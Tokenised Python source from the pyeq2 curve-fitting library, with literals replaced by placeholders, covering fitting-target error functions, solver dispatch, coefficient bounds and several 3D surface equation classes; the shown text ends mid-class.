dataCache . reducedDataCacheDictionary ) - self . dataCache . reducedDataCacheDictionary [ '<STR_LIT>' ] <EOL> ssq = numpy . sum ( numpy . square ( error ) ) <EOL> except : <EOL> return <NUM_LIT> <EOL> if numpy . isfinite ( ssq ) : <EOL> return ssq <EOL> else : <EOL> return <NUM_LIT> <EOL> def CalculateAllDataFittingTarget ( self , inCoeffs ) : <EOL> if not self . AreCoefficientsWithinBounds ( inCoeffs ) : <EOL> try : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> except : <EOL> pass <EOL> try : <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> self . CalculateModelErrors ( inCoeffs , self . dataCache . allDataCacheDictionary ) <EOL> error = self . modelAbsoluteError <EOL> if len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> error = error * self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . sum ( numpy . square ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> error = error / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> val = numpy . sum ( numpy . square ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . 
fittingTarget == "<STR_LIT>" : <EOL> val = numpy . sum ( numpy . abs ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> Q = self . modelPredictions / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> sumsqlogQ = numpy . sum ( numpy . square ( numpy . log ( Q ) ) ) <EOL> val = sumsqlogQ <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . sum ( numpy . abs ( error / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . max ( numpy . abs ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . max ( numpy . abs ( error / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> model = scipy . odr . odrpack . Model ( self . WrapperForODR ) <EOL> if len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> data = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , we = self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> else : <EOL> data = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> myodr = scipy . odr . odrpack . ODR ( data , model , beta0 = inCoeffs , maxit = <NUM_LIT:0> ) <EOL> myodr . set_job ( fit_type = <NUM_LIT:2> ) <EOL> out = myodr . run ( ) <EOL> val = out . sum_square <EOL> if numpy . 
isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> ncoef = <NUM_LIT:1.0> * len ( inCoeffs ) <EOL> nobs = <NUM_LIT:1.0> * len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> ll = - ( nobs * <NUM_LIT:0.5> ) * ( <NUM_LIT:1.0> + numpy . log ( <NUM_LIT> * numpy . pi ) ) - ( nobs * <NUM_LIT:0.5> ) * numpy . log ( numpy . dot ( error , error ) / nobs ) <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = - <NUM_LIT> * ll / nobs + ( <NUM_LIT> * ncoef / nobs ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = - <NUM_LIT> * ll / nobs + ( ncoef * numpy . log ( nobs ) ) / nobs <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> except : <EOL> return <NUM_LIT> <EOL> def Solve ( self , inNonLinearSolverAlgorithmName = '<STR_LIT>' ) : <EOL> solver = pyeq2 . solverService ( ) <EOL> if self . fixedCoefficients != [ ] or self . upperCoefficientBounds != [ ] or self . lowerCoefficientBounds != [ ] or len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> self . _canLinearSolverBeUsedForSSQABS = False <EOL> if self . splineFlag : <EOL> return solver . SolveUsingSpline ( self ) <EOL> elif self . fittingTarget == '<STR_LIT>' and self . CanLinearSolverBeUsedForSSQABS ( ) == True : <EOL> return solver . SolveUsingLinear ( self ) <EOL> elif self . fittingTarget == '<STR_LIT>' : <EOL> if len ( self . deEstimatedCoefficients ) == <NUM_LIT:0> : <EOL> self . deEstimatedCoefficients = solver . SolveUsingDE ( self ) <EOL> return solver . SolveUsingODR ( self ) <EOL> else : <EOL> if len ( self . deEstimatedCoefficients ) == <NUM_LIT:0> : <EOL> self . deEstimatedCoefficients = solver . SolveUsingDE ( self ) <EOL> self . estimatedCoefficients = solver . SolveUsingSelectedAlgorithm ( self , inAlgorithmName = inNonLinearSolverAlgorithmName ) <EOL> return solver . 
SolveUsingSimplex ( self ) <EOL> def AreCoefficientsWithinBounds ( self , inCoeffs ) : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for index in range ( len ( inCoeffs ) ) : <EOL> if ( self . upperCoefficientBounds [ index ] != None ) and ( inCoeffs [ index ] > self . upperCoefficientBounds [ index ] ) : <EOL> return False <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for index in range ( len ( inCoeffs ) ) : <EOL> if ( self . lowerCoefficientBounds [ index ] != None ) and ( inCoeffs [ index ] < self . lowerCoefficientBounds [ index ] ) : <EOL> return False <EOL> return True <EOL> def GetDisplayName ( self ) : <EOL> return self . extendedVersionHandler . AssembleDisplayName ( self ) <EOL> def GetDisplayHTML ( self ) : <EOL> return self . extendedVersionHandler . AssembleDisplayHTML ( self ) <EOL> def GetDimensionality ( self ) : <EOL> return self . _dimensionality <EOL> def CanLinearSolverBeUsedForSSQABS ( self ) : <EOL> return self . extendedVersionHandler . CanLinearSolverBeUsedForSSQABS ( self . _canLinearSolverBeUsedForSSQABS ) <EOL> def WrapperForScipyCurveFit ( self , data , * inCoeffs ) : <EOL> inCoeffs = numpy . array ( inCoeffs ) <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> return self . CalculateModelPredictions ( inCoeffs , self . dataCache . 
allDataCacheDictionary ) <EOL> def WrapperForODR ( self , inCoeffs , data ) : <EOL> if not numpy . all ( numpy . isfinite ( data ) ) : <EOL> return numpy . ones ( len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> if numpy . array_equal ( data , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> result = self . CalculateModelPredictions ( inCoeffs , self . dataCache . allDataCacheDictionary ) <EOL> else : <EOL> tempCache = self . dataCache . allDataCacheDictionary <EOL> self . dataCache . allDataCacheDictionary = { } <EOL> self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] = data <EOL> self . dataCache . FindOrCreateAllDataCache ( self ) <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . 
fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> result = self . CalculateModelPredictions ( inCoeffs , self . dataCache . allDataCacheDictionary ) <EOL> self . dataCache . allDataCacheDictionary = tempCache <EOL> return result <EOL> def GetCoefficientDesignators ( self ) : <EOL> return self . extendedVersionHandler . AssembleCoefficientDesignators ( self ) <EOL> def ShouldDataBeRejected ( self , unused ) : <EOL> true_or_false = self . extendedVersionHandler . ShouldDataBeRejected ( self ) <EOL> if self . dataCache . DependentDataContainsZeroFlag and self . fittingTarget [ - <NUM_LIT:3> : ] == "<STR_LIT>" : <EOL> true_or_false = True <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if true_or_false : <EOL> if self . dataCache . DependentDataContainsZeroFlag and self . fittingTarget [ - <NUM_LIT:3> : ] == "<STR_LIT>" : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . independentData1CannotContainZeroFlag and self . dataCache . independentData1ContainsZeroFlag : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . equation . independentData1CannotContainNegativeFlag and self . dataCache . independentData1ContainsNegativeFlag : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . equation . independentData1CannotContainPositiveFlag and self . dataCache . independentData1ContainsPositiveFlag : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . equation . independentData1CannotContainBothPositiveAndNegativeFlag and self . dataCache . independentData1ContainsPositiveFlag and self . dataCache . independentData1ContainsNegativeFlag : <EOL> self . 
reasonWhyDataRejected = '<STR_LIT>' <EOL> return true_or_false <EOL> def RecursivelyConvertIntStringsToFloatStrings ( self , inList ) : <EOL> returnList = [ ] <EOL> for item in inList : <EOL> if type ( item ) == type ( [ ] ) : <EOL> returnList . append ( self . RecursivelyConvertIntStringsToFloatStrings ( item ) ) <EOL> else : <EOL> if type ( item ) == type ( str ( '<STR_LIT>' ) ) : <EOL> if item . isdigit ( ) : <EOL> returnList . append ( str ( float ( item ) ) ) <EOL> else : <EOL> returnList . append ( item ) <EOL> else : <EOL> returnList . append ( item ) <EOL> return returnList </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> import sys , os <EOL> if os . path . join ( sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] , '<STR_LIT:..>' ) not in sys . path : <EOL> sys . path . append ( os . path . join ( sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] , '<STR_LIT:..>' ) ) <EOL> import pyeq2 <EOL> import numpy <EOL> numpy . seterr ( all = '<STR_LIT:ignore>' ) <EOL> import pyeq2 . Model_3D_BaseClass <EOL> class RexKelfkens ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = True <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = True <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogX ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . 
GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> logX = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> logY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> A = inCoeffs [ <NUM_LIT:0> ] <EOL> B = inCoeffs [ <NUM_LIT:1> ] <EOL> C = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = numpy . exp ( A + B * logX + C * logY ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class RexKelfkensTransform ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . 
Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> A = inCoeffs [ <NUM_LIT:0> ] <EOL> B = inCoeffs [ <NUM_LIT:1> ] <EOL> C = inCoeffs [ <NUM_LIT:2> ] <EOL> xscale = inCoeffs [ <NUM_LIT:3> ] <EOL> xoffset = inCoeffs [ <NUM_LIT:4> ] <EOL> yscale = inCoeffs [ <NUM_LIT:5> ] <EOL> yoffset = inCoeffs [ <NUM_LIT:6> ] <EOL> try : <EOL> temp = numpy . exp ( A + B * numpy . log ( x_in * xscale + xoffset ) + C * numpy . log ( y_in * yscale + yoffset ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaryCler_Transform ( pyeq2 . Model_3D_BaseClass . 
Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> g = inCoeffs [ <NUM_LIT:5> ] <EOL> h = inCoeffs [ <NUM_LIT:6> ] <EOL> try : <EOL> temp = a * numpy . power ( d * x_in + f , b ) * numpy . power ( g * y_in + h , c ) <EOL> return self . extendedVersionHandler . 
GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfParaboloid ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = <NUM_LIT> * a * a / numpy . square ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . 
ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfParaboloid_scaled ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> scale = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = scale * <NUM_LIT> * a * a / numpy . square ( <NUM_LIT:1.0> + <NUM_LIT> * a * a * XSQPLUSYSQ ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . 
ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfRichmondsMinimalSurface ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * a * numpy . power ( XSQPLUSYSQ , <NUM_LIT> ) / numpy . power ( b + numpy . square ( XSQPLUSYSQ ) , <NUM_LIT> ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . 
ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfWhitneysUmbrellaA ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowX ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . PowY ( NameOrValueFlag = <NUM_LIT:1> , args = [ <NUM_LIT> ] ) , [ <NUM_LIT> ] ] ) <EOL> return self . extendedVersionHandler . 
GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> PowX2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY2 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> PowY4 = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = - <NUM_LIT:1.0> * a * PowY2 / numpy . square ( PowX2 + a * ( PowY2 + PowY4 ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class GaussianCurvatureOfWhitneysUmbrellaB ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> 